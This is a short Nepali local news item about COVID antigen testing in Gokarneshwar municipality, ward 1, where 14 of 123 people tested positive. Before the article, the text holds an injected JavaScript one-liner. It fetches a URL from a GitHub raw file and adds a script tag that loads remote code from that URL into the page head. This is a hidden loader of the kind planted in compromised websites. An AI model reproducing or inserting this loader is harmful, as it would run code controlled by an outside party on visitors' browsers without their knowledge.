;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौ – गोकर्णेश्वर नगरपालिका वडा नं १ का वडा अध्यक्ष राम मानन्धरको पहलमा स्थानियाहरुको कोरोना परीक्षण गराई रहेका छन् | वडा सदस्य राजेन्द्र रोक्का स्वास्थ्यकर्मी हरूकाे साथ र सयाेग बाट अाज गाे.न.पा.१मा काेरना परिक्षण गर्दा
१२३ जनाको एन्टेजिन परिक्षण गर्दा १४ जना पोजेटिभ फेला परेका वडा अध्यक्ष राम मानन्धरले बताए । स्थानीय ओख्रेनी मा.बि र बिपि चोकमा एन्टीजेन मार्फत अनुभवी स्वास्थकर्मीहरुले परिक्षण गर्दा उक्त नतिजा आएको हो।
फेसबुक प्रतिक्रियाहरु